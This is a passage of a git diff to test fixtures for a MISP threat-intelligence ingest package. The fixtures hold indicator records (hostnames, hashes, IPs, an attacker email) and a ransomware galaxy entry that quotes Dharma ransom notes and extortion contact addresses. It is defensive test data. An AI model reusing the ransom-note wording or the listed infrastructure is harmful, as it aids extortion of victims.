Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1086","type":"hostname","category":"Network activity","to_ids":true,"uuid":"543240dc-f068-437a-baa9-48f2950d210b","event_id":"2","distribution":"5","timestamp":"1412579548","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"xenserver.ddns.net","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1089","type":"text","category":"External analysis","to_ids":false,"uuid":"543240f9-64e8-41f2-958f-4e21950d210b","event_id":"2","distribution":"5","timestamp":"1412579577","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"Nitro","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1090","type":"sha1","category":"External analysis","to_ids":true,"uuid":"56c625a7-f31c-460c-9ea1-c652950d210f","event_id":"2","distribution":"5","timestamp":"1455826343","comment":"Automatically added (via 7915aabb2e66ff14841e4ef0fbff7486)","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"0ea76f1586c008932d90c991dfdd5042f3aac8ea","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} @@ -12,4 +12,4 @@ {"Event":{"id":"158","orgc_id":"5","org_id":"1","date":"2018-01-08","threat_level_id":"1","info":"Turla: Mosquito Whitepaper","published":true,"uuid":"5a5395d1-40a0-45fc-b692-334a0a016219","attribute_count":"61","analysis":"0","timestamp":"1535462417","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637953","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f","local":false},"Attribute":{"id":"17322","type":"filename|sha1","category":"Artifacts dropped","to_ids":false,"uuid":"5a539ce1-e6a0-426a-942c-2fc50a016219","event_id":"158","distribution":"5","timestamp":"1515429089","comment":"JavaScript backdoor","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"google_update_checker.js|c51d288469df9f25e2fb7ac491918b3e579282ea","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[{"Event":{"id":"58","date":"2018-08-17","threat_level_id":"1","info":"Turla Outlook White Paper","published":true,"uuid":"5b773e07-e694-458b-b99c-27f30a016219","analysis":"0","timestamp":"1535462383","distribution":"3","org_id":"1","orgc_id":"5","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5"},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f"}}}],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"7","name":"misp-galaxy:threat-actor=\"Turla Group\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0},{"id":"70","name":"Turla","colour":"#f20f53","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"22","orgc_id":"4","org_id":"1","date":"2015-12-08","threat_level_id":"3","info":"Packrat: Seven Years of a South American Threat Actor","published":true,"uuid":"56ccdcaf-f7e4-40d8-bca1-51299062e56a","attribute_count":"133","analysis":"2","timestamp":"1516723796","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637901","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"12268","type":"email-src","category":"Payload delivery","to_ids":true,"uuid":"56ccdcb6-4d6c-4e48-b955-52849062e56a","event_id":"22","distribution":"5","timestamp":"1456266422","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"claudiobonadio88@gmail.com","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"22","orgc_id":"4","org_id":"1","date":"2015-12-08","threat_level_id":"3","info":"Packrat: Seven Years of a South American Threat Actor","published":true,"uuid":"56ccdcaf-f7e4-40d8-bca1-51299062e56a","attribute_count":"133","analysis":"2","timestamp":"1516723796","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637901","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"12298","type":"regkey","category":"Artifacts dropped","to_ids":true,"uuid":"56ccdcd6-f4b8-4383-9624-52849062e56a","event_id":"22","distribution":"5","timestamp":"1456266454","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"HKLM\\SOFTWARE\\Microsoft\\Active","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} -{"Event":{"id":"10","orgc_id":"4","org_id":"1","date":"2020-12-09","threat_level_id":"3","info":"Recent Qakbot (Qbot) activity","published":true,"uuid":"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16","attribute_count":"15","analysis":"2","timestamp":"1607868196","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637888","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"10686","type":"ip-dst|port","category":"Network activity","to_ids":true,"uuid":"5fd0c620-a844-4ace-9710-a37bc0a8ab16","event_id":"10","distribution":"5","timestamp":"1607517728","comment":"On port 2222","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"62.38.114.12|2222","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"6","name":"misp-galaxy:banker=\"Qakbot\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"10","orgc_id":"4","org_id":"1","date":"2020-12-09","threat_level_id":"3","info":"Recent Qakbot (Qbot) activity","published":true,"uuid":"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16","attribute_count":"15","analysis":"2","timestamp":"1607868196","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637888","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"10686","type":"ip-dst|port","category":"Network activity","to_ids":true,"uuid":"5fd0c620-a844-4ace-9710-a37bc0a8ab16","event_id":"10","distribution":"5","timestamp":"1607517728","comment":"On port 2222","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"89.160.20.156|2222","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"6","name":"misp-galaxy:banker=\"Qakbot\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0}]}} diff --git a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log-expected.json b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log-expected.json index 556a3e11729..5157a4cbe94 100644 --- a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log-expected.json +++ b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log-expected.json @@ -65,7 +65,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046311343Z", + "ingested": "2021-12-09T13:49:05.849316800Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"- Xchecked via VT: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"5\",\"first_seen\":null,\"id\":\"351\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1503930272\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"59a427a0-f6f8-4178-9e7d-dfd702de0b81\",\"value\":\"f2679bdabe46e10edc6352fff3c829bc\"},\"EventReport\":[],\"Galaxy\":[{\"GalaxyCluster\":[{\"authors\":[\"https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"http://pastebin.com/raw/GHgpWjar\",\"MISP Project\"],\"collection_uuid\":\"10cf658b-5d32-4c4b-bb32-61760a640372\",\"description\":\"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\\\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant\",\"galaxy_id\":\"43\",\"id\":\"6619\",\"local\":false,\"meta\":{\"date\":[\"November 2016\"],\"encryption\":[\"AES + RSA-512\"],\"extensions\":[\".dharma\",\".wallet\",\".zzzzz\",\".cmb\",\".id-BCBEF350.[paymentbtc@firemail.cc].cmb\",\".bip\",\".id-BCBEF350.[Beamsell@qq.com].bip\",\".boost\",\".[Darknes@420blaze.it].waifu\",\".brrr\",\".adobe\",\".tron\",\".AUDIT\",\".cccmn\",\".fire\",\".myjob\",\".[cyberwars@qq.com].war\",\".risk\",\".RISK\",\".bkpx\",\".[newsantaclaus@aol.com].santa\"],\"payment-method\":[\"Bitcoin - Email\"],\"ransomnotes\":[\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email paymentbtc@firemail.cc\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\\\nWrite this ID in the title of your message ACBFF130\\\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\\\nhttps://localbitcoins.com/buy_bitcoins\\\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\\\nAttention!\\\\nDo not rename encrypted files.\\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\\\nWrite this ID in the title of your message BCBEF350\\\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\\\nhttps://localbitcoins.com/buy_bitcoins \\\\nAlso you can find other places to buy Bitcoins and beginners guide here: \\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\\\nAttention!\\\\nDo not rename encrypted files. \\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email Beamsell@qq.com\"],\"ransomnotes-filenames\":[\"README.txt\",\"README.jpg\",\"Info.hta\",\"FILES ENCRYPTED.txt\",\"INFO.hta\"],\"ransomnotes-refs\":[\"https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg\",\"https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg\",\"https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg\",\"https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg\",\"https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg\"],\"refs\":[\"https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html\",\"https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/\",\"https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/\",\"https://twitter.com/demonslay335/status/1049313390097813504\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/\",\"https://twitter.com/JakubKroustek/status/1038680437508501504\",\"https://twitter.com/demonslay335/status/1059521042383814657\",\"https://twitter.com/demonslay335/status/1059940414147489792\",\"https://twitter.com/JakubKroustek/status/1060825783197933568\",\"https://twitter.com/JakubKroustek/status/1064061275863425025\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/\",\"https://www.youtube.com/watch?v=qjoYtwLx2TI\",\"https://twitter.com/GrujaRS/status/1072139616910757888\"]},\"source\":\"Various\",\"tag_id\":\"23\",\"tag_name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"type\":\"ransomware\",\"uuid\":\"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b\",\"value\":\"Dharma Ransomware\",\"version\":\"86\"}],\"description\":\"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"icon\":\"btc\",\"id\":\"43\",\"name\":\"Ransomware\",\"namespace\":\"misp\",\"type\":\"ransomware\",\"uuid\":\"3f44af2e-1480-4b6b-9aa8-f9bb21341078\",\"version\":\"4\"}],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"2\",\"local\":false,\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"Tag\":[{\"colour\":\"#0088cc\",\"exportable\":true,\"hide_tag\":false,\"id\":\"23\",\"local\":0,\"name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#004646\",\"exportable\":true,\"hide_tag\":false,\"id\":\"21\",\"local\":0,\"name\":\"type:OSINT\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#ffffff\",\"exportable\":true,\"hide_tag\":false,\"id\":\"2\",\"local\":0,\"name\":\"tlp:white\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#2c4f00\",\"exportable\":true,\"hide_tag\":false,\"id\":\"24\",\"local\":0,\"name\":\"malware_classification:malware-category=\\\"Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#00223b\",\"exportable\":true,\"hide_tag\":false,\"id\":\"3\",\"local\":0,\"name\":\"osint:source-type=\\\"blog - post\\\"\",\"numerical_value\":null,\"user_id\":\"0\"}],\"analysis\":\"2\",\"attribute_count\":\"7\",\"date\":\"2017-08-25\",\"disable_correlation\":false,\"distribution\":\"3\",\"extends_uuid\":\"\",\"id\":\"5\",\"info\":\"OSINT - New Arena Crysis Ransomware Variant Released\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"2\",\"proposal_email_lock\":false,\"publish_timestamp\":\"1603226331\",\"published\":true,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1503930276\",\"uuid\":\"59a3d08d-5dc8-4153-bc7c-456d950d210f\"}}", "category": "threat", "type": "indicator", @@ -135,7 +135,7 @@ "url": { "domain": "your-ip.getmyip.com" }, - "ip": "178.128.103.74", + "ip": "89.160.20.156", "scanner_stats": 2 }, "feed": { @@ -143,8 +143,8 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046335498Z", - "original": "{\"Event\":{\"Attribute\":{\"id\":\"10794\",\"type\":\"domain|ip\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"5bf30242-8ef4-4c52-a2d7-0b7b0a016219\",\"event_id\":\"14\",\"distribution\":\"5\",\"timestamp\":\"1542652482\",\"comment\":\"1st stage\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"your-ip.getmyip.com|178.128.103.74\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"EventReport\":[],\"Galaxy\":[{\"GalaxyCluster\":[{\"authors\":[\"https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"http://pastebin.com/raw/GHgpWjar\",\"MISP Project\"],\"collection_uuid\":\"10cf658b-5d32-4c4b-bb32-61760a640372\",\"description\":\"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\\\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant\",\"galaxy_id\":\"43\",\"id\":\"6619\",\"local\":false,\"meta\":{\"date\":[\"November 2016\"],\"encryption\":[\"AES + RSA-512\"],\"extensions\":[\".dharma\",\".wallet\",\".zzzzz\",\".cmb\",\".id-BCBEF350.[paymentbtc@firemail.cc].cmb\",\".bip\",\".id-BCBEF350.[Beamsell@qq.com].bip\",\".boost\",\".[Darknes@420blaze.it].waifu\",\".brrr\",\".adobe\",\".tron\",\".AUDIT\",\".cccmn\",\".fire\",\".myjob\",\".[cyberwars@qq.com].war\",\".risk\",\".RISK\",\".bkpx\",\".[newsantaclaus@aol.com].santa\"],\"payment-method\":[\"Bitcoin - Email\"],\"ransomnotes\":[\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email paymentbtc@firemail.cc\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\\\nWrite this ID in the title of your message ACBFF130\\\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\\\nhttps://localbitcoins.com/buy_bitcoins\\\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\\\nAttention!\\\\nDo not rename encrypted files.\\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\\\nWrite this ID in the title of your message BCBEF350\\\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\\\nhttps://localbitcoins.com/buy_bitcoins \\\\nAlso you can find other places to buy Bitcoins and beginners guide here: \\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\\\nAttention!\\\\nDo not rename encrypted files. \\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email Beamsell@qq.com\"],\"ransomnotes-filenames\":[\"README.txt\",\"README.jpg\",\"Info.hta\",\"FILES ENCRYPTED.txt\",\"INFO.hta\"],\"ransomnotes-refs\":[\"https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg\",\"https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg\",\"https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg\",\"https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg\",\"https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg\"],\"refs\":[\"https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html\",\"https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/\",\"https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/\",\"https://twitter.com/demonslay335/status/1049313390097813504\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/\",\"https://twitter.com/JakubKroustek/status/1038680437508501504\",\"https://twitter.com/demonslay335/status/1059521042383814657\",\"https://twitter.com/demonslay335/status/1059940414147489792\",\"https://twitter.com/JakubKroustek/status/1060825783197933568\",\"https://twitter.com/JakubKroustek/status/1064061275863425025\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/\",\"https://www.youtube.com/watch?v=qjoYtwLx2TI\",\"https://twitter.com/GrujaRS/status/1072139616910757888\"]},\"source\":\"Various\",\"tag_id\":\"23\",\"tag_name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"type\":\"ransomware\",\"uuid\":\"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b\",\"value\":\"Dharma Ransomware\",\"version\":\"86\"}],\"description\":\"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"icon\":\"btc\",\"id\":\"43\",\"name\":\"Ransomware\",\"namespace\":\"misp\",\"type\":\"ransomware\",\"uuid\":\"3f44af2e-1480-4b6b-9aa8-f9bb21341078\",\"version\":\"4\"}],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"2\",\"local\":false,\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"Tag\":[{\"colour\":\"#0088cc\",\"exportable\":true,\"hide_tag\":false,\"id\":\"23\",\"local\":0,\"name\":\"misp-galaxy:ransomware=\\\"Dharma 